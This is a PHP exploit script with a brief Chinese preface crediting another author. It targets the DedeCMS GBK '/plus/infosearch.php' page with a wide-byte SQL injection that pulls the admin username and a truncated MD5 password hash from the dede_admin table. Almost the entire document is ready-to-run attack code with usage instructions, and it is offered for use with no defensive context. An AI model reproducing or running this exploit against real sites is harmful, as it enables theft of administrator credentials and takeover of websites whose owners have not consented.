说明：强烈感谢oldjun前辈，我是仿他的exp写的，嘿嘿

漏洞文件是大家应该清楚 ，写的不好，大家不要怪哇！

<?
print_r('
--------------------------------------------------------------------------------
dedecms gpk "/plus/infosearch.php" SQL injection exploit
BY 冰的原点
thx oldjun
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}



function sendpacketii($packet)
{
global  $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}


$packet ="GET ".$path."plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,concat(uname,0x3a,substring(pwd,9,16)),4,5,6%20from%20dede_admin/*# HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(":",$html))
{
echo $packet;
echo $html;
die("Exploit failed...");
}
else
{
$pattern="/\" class=\"title\">(.*?)<\/a>/si";
preg_match($pattern,$html,$pg);
$result=explode(":",$pg[1]);
print_r('
--------------------------------------------------------------------------------
[+]username -> '.$result[0].'
[+]password(16位md5) -> '.$result[1].'
--------------------------------------------------------------------------------
');
}
function is_hash($hash)
{
if (ereg("^[a-z0-9]{16}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($result[1])) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>